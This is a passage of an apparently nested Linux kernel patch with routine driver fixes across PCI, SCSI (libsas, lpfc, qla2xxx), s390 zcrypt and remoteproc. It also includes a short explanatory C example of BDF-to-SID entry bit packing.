+-				writel(val, bdf_to_sid_base + current_hash * sizeof(u32));
+-			}
+-
+-			val = readl(bdf_to_sid_base + hash * sizeof(u32));
+-		}
+-
+-		/* BDF [31:16] | SID [15:8] | NEXT [7:0] */
+-		val = map[i].bdf << 16 | (map[i].smmu_sid - smmu_sid_base) << 8 | 0;
+-		writel(val, bdf_to_sid_base + hash * sizeof(u32));
+-	}
+-
+-	kfree(map);
+-
+-	return 0;
+-}
+-
+ static int qcom_pcie_host_init(struct dw_pcie_rp *pp)
+ {
+ 	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
+@@ -1616,7 +1625,7 @@ static const struct qcom_pcie_ops ops_1_9_0 = {
+ 	.init = qcom_pcie_init_2_7_0,
+ 	.deinit = qcom_pcie_deinit_2_7_0,
+ 	.ltssm_enable = qcom_pcie_2_3_2_ltssm_enable,
+-	.config_sid = qcom_pcie_config_sid_sm8250,
++	.config_sid = qcom_pcie_config_sid_1_9_0,
+ };
+ 
+ /* Qcom IP rev.: 2.9.0  Synopsys IP rev.: 5.00a */
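
The relocated qcom_pcie_config_sid_1_9_0() packs each BDF-to-SID table entry as the BDF in bits 31:16, the SID offset in bits 15:8 and a NEXT hash in bits 7:0 used to chain colliding entries, per its inline comment. The packing and unpacking in isolation:

#include <stdint.h>
#include <stdio.h>

/* BDF [31:16] | SID [15:8] | NEXT [7:0], per the comment in the code. */
static uint32_t sid_entry_pack(uint16_t bdf, uint8_t sid, uint8_t next)
{
	return ((uint32_t)bdf << 16) | ((uint32_t)sid << 8) | next;
}

static void sid_entry_unpack(uint32_t val, uint16_t *bdf,
			     uint8_t *sid, uint8_t *next)
{
	*bdf  = val >> 16;
	*sid  = (val >> 8) & 0xff;
	*next = val & 0xff;
}

int main(void)
{
	uint16_t bdf;
	uint8_t sid, next;

	sid_entry_unpack(sid_entry_pack(0x0100, 0x02, 0x00),
			 &bdf, &sid, &next);
	printf("%04x %02x %02x\n", bdf, sid, next);     /* 0100 02 00 */
	return 0;
}
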
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index 9693bab59bf7c..b36cbc9136ae1 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -49,6 +49,7 @@
+ #include <linux/refcount.h>
+ #include <linux/irqdomain.h>
+ #include <linux/acpi.h>
++#include <linux/sizes.h>
+ #include <asm/mshyperv.h>
+ 
+ /*
+@@ -465,7 +466,7 @@ struct pci_eject_response {
+ 	u32 status;
+ } __packed;
+ 
+-static int pci_ring_size = (4 * PAGE_SIZE);
++static int pci_ring_size = VMBUS_RING_SIZE(SZ_16K);
+ 
+ /*
+  * Driver specific state.
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index f47a3b10bf504..8dda3b205dfd0 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -473,6 +473,13 @@ static void pci_device_remove(struct device *dev)
+ 
+ 	if (drv->remove) {
+ 		pm_runtime_get_sync(dev);
++		/*
++		 * If the driver provides a .runtime_idle() callback and it has
++		 * started to run already, it may continue to run in parallel
++		 * with the code below, so wait until all of the runtime PM
++		 * activity has completed.
++		 */
++		pm_runtime_barrier(dev);
+ 		drv->remove(pci_dev);
+ 		pm_runtime_put_noidle(dev);
+ 	}
+diff --git a/drivers/pci/pcie/err.c b/drivers/pci/pcie/err.c
+index 59c90d04a609a..705893b5f7b09 100644
+--- a/drivers/pci/pcie/err.c
++++ b/drivers/pci/pcie/err.c
+@@ -13,6 +13,7 @@
+ #define dev_fmt(fmt) "AER: " fmt
+ 
+ #include <linux/pci.h>
++#include <linux/pm_runtime.h>
+ #include <linux/module.h>
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+@@ -85,6 +86,18 @@ static int report_error_detected(struct pci_dev *dev,
+ 	return 0;
+ }
+ 
++static int pci_pm_runtime_get_sync(struct pci_dev *pdev, void *data)
++{
++	pm_runtime_get_sync(&pdev->dev);
++	return 0;
++}
++
++static int pci_pm_runtime_put(struct pci_dev *pdev, void *data)
++{
++	pm_runtime_put(&pdev->dev);
++	return 0;
++}
++
+ static int report_frozen_detected(struct pci_dev *dev, void *data)
+ {
+ 	return report_error_detected(dev, pci_channel_io_frozen, data);
+@@ -207,6 +220,8 @@ pci_ers_result_t pcie_do_recovery(struct pci_dev *dev,
+ 	else
+ 		bridge = pci_upstream_bridge(dev);
+ 
++	pci_walk_bridge(bridge, pci_pm_runtime_get_sync, NULL);
++
+ 	pci_dbg(bridge, "broadcast error_detected message\n");
+ 	if (state == pci_channel_io_frozen) {
+ 		pci_walk_bridge(bridge, report_frozen_detected, &status);
+@@ -251,10 +266,15 @@ pci_ers_result_t pcie_do_recovery(struct pci_dev *dev,
+ 		pcie_clear_device_status(dev);
+ 		pci_aer_clear_nonfatal_status(dev);
+ 	}
++
++	pci_walk_bridge(bridge, pci_pm_runtime_put, NULL);
++
+ 	pci_info(bridge, "device recovery successful\n");
+ 	return status;
+ 
+ failed:
++	pci_walk_bridge(bridge, pci_pm_runtime_put, NULL);
++
+ 	pci_uevent_ers(bridge, PCI_ERS_RESULT_DISCONNECT);
+ 
+ 	/* TODO: Should kernel panic here? */
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index c175b70a984c6..289ba6902e41b 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -6078,6 +6078,8 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2b, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2d, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a31, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0xa73f, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0xa76e, dpc_log_size);
+ #endif
+ 
+ /*
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index 4d5b4071d47d5..dc22b1dd2c8ba 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -1518,6 +1518,19 @@ int tegra_xusb_padctl_get_usb3_companion(struct tegra_xusb_padctl *padctl,
+ }
+ EXPORT_SYMBOL_GPL(tegra_xusb_padctl_get_usb3_companion);
+ 
++int tegra_xusb_padctl_get_port_number(struct phy *phy)
++{
++	struct tegra_xusb_lane *lane;
++
++	if (!phy)
++		return -ENODEV;
++
++	lane = phy_get_drvdata(phy);
++
++	return lane->index;
++}
++EXPORT_SYMBOL_GPL(tegra_xusb_padctl_get_port_number);
++
+ MODULE_AUTHOR("Thierry Reding <treding@nvidia.com>");
+ MODULE_DESCRIPTION("Tegra XUSB Pad Controller driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index 17cc4b45e0239..a64f56ddd4a44 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -20,9 +20,11 @@
+ #define P2SBC_HIDE		BIT(8)
+ 
+ #define P2SB_DEVFN_DEFAULT	PCI_DEVFN(31, 1)
++#define P2SB_DEVFN_GOLDMONT	PCI_DEVFN(13, 0)
++#define SPI_DEVFN_GOLDMONT	PCI_DEVFN(13, 2)
+ 
+ static const struct x86_cpu_id p2sb_cpu_ids[] = {
+-	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT,	PCI_DEVFN(13, 0)),
++	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT, P2SB_DEVFN_GOLDMONT),
+ 	{}
+ };
+ 
+@@ -98,21 +100,12 @@ static void p2sb_scan_and_cache_devfn(struct pci_bus *bus, unsigned int devfn)
+ 
+ static int p2sb_scan_and_cache(struct pci_bus *bus, unsigned int devfn)
+ {
+-	unsigned int slot, fn;
+-
+-	if (PCI_FUNC(devfn) == 0) {
+-		/*
+-		 * When function number of the P2SB device is zero, scan it and
+-		 * other function numbers, and if devices are available, cache
+-		 * their BAR0s.
+-		 */
+-		slot = PCI_SLOT(devfn);
+-		for (fn = 0; fn < NR_P2SB_RES_CACHE; fn++)
+-			p2sb_scan_and_cache_devfn(bus, PCI_DEVFN(slot, fn));
+-	} else {
+-		/* Scan the P2SB device and cache its BAR0 */
+-		p2sb_scan_and_cache_devfn(bus, devfn);
+-	}
++	/* Scan the P2SB device and cache its BAR0 */
++	p2sb_scan_and_cache_devfn(bus, devfn);
++
++	/* On Goldmont p2sb_bar() also gets called for the SPI controller */
++	if (devfn == P2SB_DEVFN_GOLDMONT)
++		p2sb_scan_and_cache_devfn(bus, SPI_DEVFN_GOLDMONT);
+ 
+ 	if (!p2sb_valid_resource(&p2sb_resources[PCI_FUNC(devfn)].res))
+ 		return -ENOENT;
+diff --git a/drivers/pwm/pwm-img.c b/drivers/pwm/pwm-img.c
+index 0fccf061ab958..8ce6c453adf07 100644
+--- a/drivers/pwm/pwm-img.c
++++ b/drivers/pwm/pwm-img.c
+@@ -289,9 +289,9 @@ static int img_pwm_probe(struct platform_device *pdev)
+ 		return PTR_ERR(imgchip->sys_clk);
+ 	}
+ 
+-	imgchip->pwm_clk = devm_clk_get(&pdev->dev, "imgchip");
++	imgchip->pwm_clk = devm_clk_get(&pdev->dev, "pwm");
+ 	if (IS_ERR(imgchip->pwm_clk)) {
+-		dev_err(&pdev->dev, "failed to get imgchip clock\n");
++		dev_err(&pdev->dev, "failed to get pwm clock\n");
+ 		return PTR_ERR(imgchip->pwm_clk);
+ 	}
+ 
+diff --git a/drivers/remoteproc/remoteproc_virtio.c b/drivers/remoteproc/remoteproc_virtio.c
+index 0e95525c11581..ab5e4f02ab225 100644
+--- a/drivers/remoteproc/remoteproc_virtio.c
++++ b/drivers/remoteproc/remoteproc_virtio.c
+@@ -351,6 +351,9 @@ static void rproc_virtio_dev_release(struct device *dev)
+ 
+ 	kfree(vdev);
+ 
++	of_reserved_mem_device_release(&rvdev->pdev->dev);
++	dma_release_coherent_memory(&rvdev->pdev->dev);
++
+ 	put_device(&rvdev->pdev->dev);
+ }
+ 
+@@ -584,9 +587,6 @@ static int rproc_virtio_remove(struct platform_device *pdev)
+ 	rproc_remove_subdev(rproc, &rvdev->subdev);
+ 	rproc_remove_rvdev(rvdev);
+ 
+-	of_reserved_mem_device_release(&pdev->dev);
+-	dma_release_coherent_memory(&pdev->dev);
+-
+ 	put_device(&rproc->dev);
+ 
+ 	return 0;
+diff --git a/drivers/s390/crypto/zcrypt_api.c b/drivers/s390/crypto/zcrypt_api.c
+index 28e34d155334b..6f44963d34bbf 100644
+--- a/drivers/s390/crypto/zcrypt_api.c
++++ b/drivers/s390/crypto/zcrypt_api.c
+@@ -617,6 +617,7 @@ static inline struct zcrypt_queue *zcrypt_pick_queue(struct zcrypt_card *zc,
+ {
+ 	if (!zq || !try_module_get(zq->queue->ap_dev.device.driver->owner))
+ 		return NULL;
++	zcrypt_card_get(zc);
+ 	zcrypt_queue_get(zq);
+ 	get_device(&zq->queue->ap_dev.device);
+ 	atomic_add(weight, &zc->load);
+@@ -636,6 +637,7 @@ static inline void zcrypt_drop_queue(struct zcrypt_card *zc,
+ 	atomic_sub(weight, &zq->load);
+ 	put_device(&zq->queue->ap_dev.device);
+ 	zcrypt_queue_put(zq);
++	zcrypt_card_put(zc);
+ 	module_put(mod);
+ }
+ 
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 8b825364baade..c785493b105c0 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -353,12 +353,13 @@ static void scsi_host_dev_release(struct device *dev)
+ 
+ 	if (shost->shost_state == SHOST_CREATED) {
+ 		/*
+-		 * Free the shost_dev device name here if scsi_host_alloc()
+-		 * and scsi_host_put() have been called but neither
++		 * Free the shost_dev device name and remove the proc host dir
++		 * here if scsi_host_{alloc,put}() have been called but neither
+ 		 * scsi_host_add() nor scsi_host_remove() has been called.
+ 		 * This avoids that the memory allocated for the shost_dev
+-		 * name is leaked.
++		 * name as well as the proc dir structure are leaked.
+ 		 */
++		scsi_proc_hostdir_rm(shost->hostt);
+ 		kfree(dev_name(&shost->shost_dev));
+ 	}
+ 
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 63a23251fb1d8..4b5ceba68e46e 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -1651,6 +1651,16 @@ int sas_discover_root_expander(struct domain_device *dev)
+ 
+ /* ---------- Domain revalidation ---------- */
+ 
++static void sas_get_sas_addr_and_dev_type(struct smp_disc_resp *disc_resp,
++					  u8 *sas_addr,
++					  enum sas_device_type *type)
++{
++	memcpy(sas_addr, disc_resp->disc.attached_sas_addr, SAS_ADDR_SIZE);
++	*type = to_dev_type(&disc_resp->disc);
++	if (*type == SAS_PHY_UNUSED)
++		memset(sas_addr, 0, SAS_ADDR_SIZE);
++}
++
+ static int sas_get_phy_discover(struct domain_device *dev,
+ 				int phy_id, struct smp_disc_resp *disc_resp)
+ {
+@@ -1704,13 +1714,8 @@ int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
+ 		return -ENOMEM;
+ 
+ 	res = sas_get_phy_discover(dev, phy_id, disc_resp);
+-	if (res == 0) {
+-		memcpy(sas_addr, disc_resp->disc.attached_sas_addr,
+-		       SAS_ADDR_SIZE);
+-		*type = to_dev_type(&disc_resp->disc);
+-		if (*type == 0)
+-			memset(sas_addr, 0, SAS_ADDR_SIZE);
+-	}
++	if (res == 0)
++		sas_get_sas_addr_and_dev_type(disc_resp, sas_addr, type);
+ 	kfree(disc_resp);
+ 	return res;
+ }
+@@ -1972,6 +1977,7 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 	struct expander_device *ex = &dev->ex_dev;
+ 	struct ex_phy *phy = &ex->ex_phy[phy_id];
+ 	enum sas_device_type type = SAS_PHY_UNUSED;
++	struct smp_disc_resp *disc_resp;
+ 	u8 sas_addr[SAS_ADDR_SIZE];
+ 	char msg[80] = "";
+ 	int res;
+@@ -1983,33 +1989,41 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 		 SAS_ADDR(dev->sas_addr), phy_id, msg);
+ 
+ 	memset(sas_addr, 0, SAS_ADDR_SIZE);
+-	res = sas_get_phy_attached_dev(dev, phy_id, sas_addr, &type);
++	disc_resp = alloc_smp_resp(DISCOVER_RESP_SIZE);
++	if (!disc_resp)
++		return -ENOMEM;
++
++	res = sas_get_phy_discover(dev, phy_id, disc_resp);
+ 	switch (res) {
+ 	case SMP_RESP_NO_PHY:
+ 		phy->phy_state = PHY_NOT_PRESENT;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+-		return res;
++		goto out_free_resp;
+ 	case SMP_RESP_PHY_VACANT:
+ 		phy->phy_state = PHY_VACANT;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+-		return res;
++		goto out_free_resp;
+ 	case SMP_RESP_FUNC_ACC:
+ 		break;
+ 	case -ECOMM:
+ 		break;
+ 	default:
+-		return res;
++		goto out_free_resp;
+ 	}
+ 
++	if (res == 0)
++		sas_get_sas_addr_and_dev_type(disc_resp, sas_addr, &type);
++
+ 	if ((SAS_ADDR(sas_addr) == 0) || (res == -ECOMM)) {
+ 		phy->phy_state = PHY_EMPTY;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+ 		/*
+-		 * Even though the PHY is empty, for convenience we discover
+-		 * the PHY to update the PHY info, like negotiated linkrate.
++		 * Even though the PHY is empty, for convenience we update
++		 * the PHY info, like negotiated linkrate.
+ 		 */
+-		sas_ex_phy_discover(dev, phy_id);
+-		return res;
++		if (res == 0)
++			sas_set_ex_phy(dev, phy_id, disc_resp);
++		goto out_free_resp;
+ 	} else if (SAS_ADDR(sas_addr) == SAS_ADDR(phy->attached_sas_addr) &&
+ 		   dev_type_flutter(type, phy->attached_dev_type)) {
+ 		struct domain_device *ata_dev = sas_ex_to_ata(dev, phy_id);
+@@ -2021,7 +2035,7 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 			action = ", needs recovery";
+ 		pr_debug("ex %016llx phy%02d broadcast flutter%s\n",
+ 			 SAS_ADDR(dev->sas_addr), phy_id, action);
+-		return res;
++		goto out_free_resp;
+ 	}
+ 
+ 	/* we always have to delete the old device when we went here */
+@@ -2030,7 +2044,10 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 		SAS_ADDR(phy->attached_sas_addr));
+ 	sas_unregister_devs_sas_addr(dev, phy_id, last);
+ 
+-	return sas_discover_new(dev, phy_id);
++	res = sas_discover_new(dev, phy_id);
++out_free_resp:
++	kfree(disc_resp);
++	return res;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index b54fafb486e06..2373dad016033 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -3169,10 +3169,10 @@ lpfc_bsg_diag_loopback_run(struct bsg_job *job)
+ 	}
+ 
+ 	cmdwqe = &cmdiocbq->wqe;
+-	memset(cmdwqe, 0, sizeof(union lpfc_wqe));
++	memset(cmdwqe, 0, sizeof(*cmdwqe));
+ 	if (phba->sli_rev < LPFC_SLI_REV4) {
+ 		rspwqe = &rspiocbq->wqe;
+-		memset(rspwqe, 0, sizeof(union lpfc_wqe));
++		memset(rspwqe, 0, sizeof(*rspwqe));
+ 	}
+ 
+ 	INIT_LIST_HEAD(&head);
+diff --git a/drivers/scsi/lpfc/lpfc_nvmet.c b/drivers/scsi/lpfc/lpfc_nvmet.c
+index f7cfac0da9b6e..1c64da3b2e9f0 100644
+--- a/drivers/scsi/lpfc/lpfc_nvmet.c
++++ b/drivers/scsi/lpfc/lpfc_nvmet.c
+@@ -1586,7 +1586,7 @@ lpfc_nvmet_setup_io_context(struct lpfc_hba *phba)
+ 		wqe = &nvmewqe->wqe;
+ 
+ 		/* Initialize WQE */
+-		memset(wqe, 0, sizeof(union lpfc_wqe));
++		memset(wqe, 0, sizeof(*wqe));
+ 
+ 		ctx_buf->iocbq->cmd_dmabuf = NULL;
+ 		spin_lock(&phba->sli4_hba.sgl_list_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index 07fbaa452d8a1..0d414c1aa84e7 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -2741,7 +2741,13 @@ qla2x00_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 		return;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+-		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		/* Will wait for wind down of adapter */
++		ql_dbg(ql_dbg_aer, fcport->vha, 0x900c,
++		    "%s pci offline detected (id %06x)\n", __func__,
++		    fcport->d_id.b24);
++		qla_pci_set_eeh_busy(fcport->vha);
++		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
++		    0, WAIT_TARGET);
+ 		return;
+ 	}
+ }
+@@ -2763,7 +2769,11 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 	vha = fcport->vha;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+-		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		/* Will wait for wind down of adapter */
++		ql_dbg(ql_dbg_aer, fcport->vha, 0x900b,
++		    "%s pci offline detected (id %06x)\n", __func__,
++		    fcport->d_id.b24);
++		qla_pci_set_eeh_busy(vha);
+ 		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
+ 			0, WAIT_TARGET);
+ 		return;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 1713588f671f3..31c451daeeb82 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -83,7 +83,7 @@ typedef union {
+ #include "qla_nvme.h"
+ #define QLA2XXX_DRIVER_NAME	"qla2xxx"
+ #define QLA2XXX_APIDEV		"ql2xapidev"
+-#define QLA2XXX_MANUFACTURER	"Marvell Semiconductor, Inc."
++#define QLA2XXX_MANUFACTURER	"Marvell"
+ 
+ /*
+  * We have MAILBOX_REGISTER_COUNT sized arrays in a few places,
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index 2e4537f9e5b50..73cd869caf609 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -44,7 +44,7 @@ extern int qla2x00_fabric_login(scsi_qla_host_t *, fc_port_t *, uint16_t *);
+ extern int qla2x00_local_device_login(scsi_qla_host_t *, fc_port_t *);
+ 
+ extern int qla24xx_els_dcmd_iocb(scsi_qla_host_t *, int, port_id_t);
+-extern int qla24xx_els_dcmd2_iocb(scsi_qla_host_t *, int, fc_port_t *, bool);
++extern int qla24xx_els_dcmd2_iocb(scsi_qla_host_t *, int, fc_port_t *);
+ extern void qla2x00_els_dcmd2_free(scsi_qla_host_t *vha,
+ 				   struct els_plogi *els_plogi);
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 884ed77259f85..c64e44964d840 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1187,8 +1187,12 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ 	return rval;
+ 
+ done_free_sp:
+-	/* ref: INIT */
+-	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++	/*
++	 * use qla24xx_async_gnl_sp_done to purge all pending gnl requests.
++	 * kref_put is called behind the scenes.
++	 */
++	sp->u.iocb_cmd.u.mbx.in_mb[0] = MBS_COMMAND_ERROR;
++	qla24xx_async_gnl_sp_done(sp, QLA_COMMAND_ERROR);
+ 	fcport->flags &= ~(FCF_ASYNC_SENT);
+ done:
+ 	fcport->flags &= ~(FCF_ASYNC_ACTIVE);
+@@ -2666,6 +2670,40 @@ qla83xx_nic_core_fw_load(scsi_qla_host_t *vha)
+ 	return rval;
+ }
+ 
++static void qla_enable_fce_trace(scsi_qla_host_t *vha)
++{
++	int rval;
++	struct qla_hw_data *ha = vha->hw;
++
++	if (ha->fce) {
++		ha->flags.fce_enabled = 1;
++		memset(ha->fce, 0, fce_calc_size(ha->fce_bufs));
++		rval = qla2x00_enable_fce_trace(vha,
++		    ha->fce_dma, ha->fce_bufs, ha->fce_mb, &ha->fce_bufs);
++
++		if (rval) {
++			ql_log(ql_log_warn, vha, 0x8033,
++			    "Unable to reinitialize FCE (%d).\n", rval);
++			ha->flags.fce_enabled = 0;
++		}
++	}
++}
++
++static void qla_enable_eft_trace(scsi_qla_host_t *vha)
++{
++	int rval;
++	struct qla_hw_data *ha = vha->hw;
++
++	if (ha->eft) {
++		memset(ha->eft, 0, EFT_SIZE);
++		rval = qla2x00_enable_eft_trace(vha, ha->eft_dma, EFT_NUM_BUFFERS);
++
++		if (rval) {
++			ql_log(ql_log_warn, vha, 0x8034,
++			    "Unable to reinitialize EFT (%d).\n", rval);
++		}
++	}
++}
+ /*
+ * qla2x00_initialize_adapter
+ *      Initialize board.
+@@ -3669,9 +3707,8 @@ qla24xx_chip_diag(scsi_qla_host_t *vha)
+ }
+ 
+ static void
+-qla2x00_init_fce_trace(scsi_qla_host_t *vha)
++qla2x00_alloc_fce_trace(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	dma_addr_t tc_dma;
+ 	void *tc;
+ 	struct qla_hw_data *ha = vha->hw;
+@@ -3700,27 +3737,17 @@ qla2x00_init_fce_trace(scsi_qla_host_t *vha)
+ 		return;
+ 	}
+ 
+-	rval = qla2x00_enable_fce_trace(vha, tc_dma, FCE_NUM_BUFFERS,
+-					ha->fce_mb, &ha->fce_bufs);
+-	if (rval) {
+-		ql_log(ql_log_warn, vha, 0x00bf,
+-		       "Unable to initialize FCE (%d).\n", rval);
+-		dma_free_coherent(&ha->pdev->dev, FCE_SIZE, tc, tc_dma);
+-		return;
+-	}
+-
+ 	ql_dbg(ql_dbg_init, vha, 0x00c0,
+ 	       "Allocated (%d KB) for FCE...\n", FCE_SIZE / 1024);
+ 
+-	ha->flags.fce_enabled = 1;
+ 	ha->fce_dma = tc_dma;
+ 	ha->fce = tc;
++	ha->fce_bufs = FCE_NUM_BUFFERS;
+ }
+ 
+ static void
+-qla2x00_init_eft_trace(scsi_qla_host_t *vha)
++qla2x00_alloc_eft_trace(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	dma_addr_t tc_dma;
+ 	void *tc;
+ 	struct qla_hw_data *ha = vha->hw;
+@@ -3745,14 +3772,6 @@ qla2x00_init_eft_trace(scsi_qla_host_t *vha)
+ 		return;
+ 	}
+ 
+-	rval = qla2x00_enable_eft_trace(vha, tc_dma, EFT_NUM_BUFFERS);
+-	if (rval) {
+-		ql_log(ql_log_warn, vha, 0x00c2,
+-		       "Unable to initialize EFT (%d).\n", rval);
+-		dma_free_coherent(&ha->pdev->dev, EFT_SIZE, tc, tc_dma);
+-		return;
+-	}
+-
+ 	ql_dbg(ql_dbg_init, vha, 0x00c3,
+ 	       "Allocated (%d KB) EFT ...\n", EFT_SIZE / 1024);
+ 
+@@ -3760,13 +3779,6 @@ qla2x00_init_eft_trace(scsi_qla_host_t *vha)
+ 	ha->eft = tc;
+ }
+ 
+-static void
+-qla2x00_alloc_offload_mem(scsi_qla_host_t *vha)
+-{
+-	qla2x00_init_fce_trace(vha);
+-	qla2x00_init_eft_trace(vha);
+-}
+-
+ void
+ qla2x00_alloc_fw_dump(scsi_qla_host_t *vha)
+ {
+@@ -3821,10 +3833,10 @@ qla2x00_alloc_fw_dump(scsi_qla_host_t *vha)
+ 		if (ha->tgt.atio_ring)
+ 			mq_size += ha->tgt.atio_q_length * sizeof(request_t);
+ 
+-		qla2x00_init_fce_trace(vha);
++		qla2x00_alloc_fce_trace(vha);
+ 		if (ha->fce)
+ 			fce_size = sizeof(struct qla2xxx_fce_chain) + FCE_SIZE;
+-		qla2x00_init_eft_trace(vha);
++		qla2x00_alloc_eft_trace(vha);
+ 		if (ha->eft)
+ 			eft_size = EFT_SIZE;
+ 	}
+@@ -4254,7 +4266,6 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct device_reg_2xxx __iomem *reg = &ha->iobase->isp;
+ 	unsigned long flags;
+-	uint16_t fw_major_version;
+ 	int done_once = 0;
+ 
+ 	if (IS_P3P_TYPE(ha)) {
+@@ -4321,7 +4332,6 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 					goto failed;
+ 
+ enable_82xx_npiv:
+-				fw_major_version = ha->fw_major_version;
+ 				if (IS_P3P_TYPE(ha))
+ 					qla82xx_check_md_needed(vha);
+ 				else
+@@ -4350,12 +4360,11 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 				if (rval != QLA_SUCCESS)
+ 					goto failed;
+ 
+-				if (!fw_major_version && !(IS_P3P_TYPE(ha)))
+-					qla2x00_alloc_offload_mem(vha);
+-
+ 				if (ql2xallocfwdump && !(IS_P3P_TYPE(ha)))
+ 					qla2x00_alloc_fw_dump(vha);
+ 
++				qla_enable_fce_trace(vha);
++				qla_enable_eft_trace(vha);
+ 			} else {
+ 				goto failed;
+ 			}
+@@ -7540,12 +7549,12 @@ qla2x00_abort_isp_cleanup(scsi_qla_host_t *vha)
+ int
+ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	uint8_t        status = 0;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct scsi_qla_host *vp, *tvp;
+ 	struct req_que *req = ha->req_q_map[0];
+ 	unsigned long flags;
++	fc_port_t *fcport;
+ 
+ 	if (vha->flags.online) {
+ 		qla2x00_abort_isp_cleanup(vha);
+@@ -7614,6 +7623,15 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 			       "ISP Abort - ISP reg disconnect post nvmram config, exiting.\n");
+ 			return status;
+ 		}
++
++		/* User may have updated [fcp|nvme] prefer in flash */
++		list_for_each_entry(fcport, &vha->vp_fcports, list) {
++			if (NVME_PRIORITY(ha, fcport))
++				fcport->do_prli_nvme = 1;
++			else
++				fcport->do_prli_nvme = 0;
++		}
++
+ 		if (!qla2x00_restart_isp(vha)) {
+ 			clear_bit(RESET_MARKER_NEEDED, &vha->dpc_flags);
+ 
+@@ -7634,31 +7652,7 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 
+ 			if (IS_QLA81XX(ha) || IS_QLA8031(ha))
+ 				qla2x00_get_fw_version(vha);
+-			if (ha->fce) {
+-				ha->flags.fce_enabled = 1;
+-				memset(ha->fce, 0,
+-				    fce_calc_size(ha->fce_bufs));
+-				rval = qla2x00_enable_fce_trace(vha,
+-				    ha->fce_dma, ha->fce_bufs, ha->fce_mb,
+-				    &ha->fce_bufs);
+-				if (rval) {
+-					ql_log(ql_log_warn, vha, 0x8033,
